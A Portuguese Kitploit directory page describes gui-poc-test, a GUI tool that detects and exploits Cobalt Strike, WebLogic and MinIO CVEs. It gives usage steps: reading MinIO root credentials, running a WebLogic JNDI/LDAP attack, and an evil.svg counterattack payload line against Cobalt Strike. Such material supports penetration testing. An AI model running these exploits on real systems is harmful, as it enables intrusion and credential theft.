Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Gui-poc-test — Uma ferramenta de teste para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Ferramentas/GitHubGitHub/romanc9/gui-poc-test
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoDesenvolvimento de Payloads
GitHubromanc9/gui-poc-test

Gui-poc-test

Uma ferramenta de teste para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gui-poc-test

Uma ferramenta de teste para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Ferramenta de detecção e exploração de vulnerabilidades com interface gráfica para essas três vulnerabilidades

Notas importantes

  1. Para executar o jar, é necessário Java 8

  2. Destinado a um único alvo, não adequado para varredura de múltiplos IPs

  3. Ao empacotar, a exploração da vulnerabilidade Weblogic precisa referenciar wlfullclient.jar, que deve ser adicionado manualmente

Uso

java -jar Gui-poc-test.jar

Modo de uso: há dois botões, "Detectar" e "Explorar". O uso varia conforme a vulnerabilidade, com dicas na interface da ferramenta

MinIO – Vazamento de informações:

Insira o alvo, sem necessidade de porta (padrão 9000, ajustável, veja no código fonte GuiDemo.java:linha144)

Exibe MINIO_ROOT_USER e MINIO_ROOT_PASSWORD, entre outros

image

Weblogic RCE

Insira IP do alvo, porta e endereço do servidor LDAP

Detecção:

image

Nota: A exploração da vulnerabilidade requer configurar seu próprio servidor LDAP (público)

  • Ferramenta de exploração JNDI: use a ferramenta JNDIExploit.jar para iniciar serviços LDAP e WEB, consulte https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. Após selecionar a vulnerabilidade, é exibido o método de autoverificação. No listener do CS, insira o código de detecção para verificar se a vulnerabilidade existe
  2. Pré-requisito para exploração: já obteve o trojan (exe) do alvo localmente
  3. Requisitos de ambiente: win, python3, pip3 instalado com frida-tools
  4. Python adicionado às variáveis de ambiente
  5. Configure seu próprio servidor para hospedar o arquivo svg, o jar, e que o alvo possa acessá-los
  6. Insira o caminho absoluto do exe e o endereço do svg, separados por espaço, clique em "Executar" para contra-atacar
  7. O conteúdo do jar é configurável por você; o exemplo exibe uma calculadora
  8. O nome padrão do trojan é beacon, modificável, veja no código fonte cve_2022_39197.py:linha28

Exemplo de payload: beacon.exe http://127.0.0.1:4444/evil.svg

Resultado: o trojan é executado no windows e o cliente CS no mac faz a conexão

Ao mesmo tempo, o CS executa o conteúdo do jar e abre a calculadora

image

O windows registra o endereço de acesso do CS

image

Referências

Princípios: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

Patch do CS: https://github.com/burpheart/CVE-2022-39197-patch

Baixar ferramenta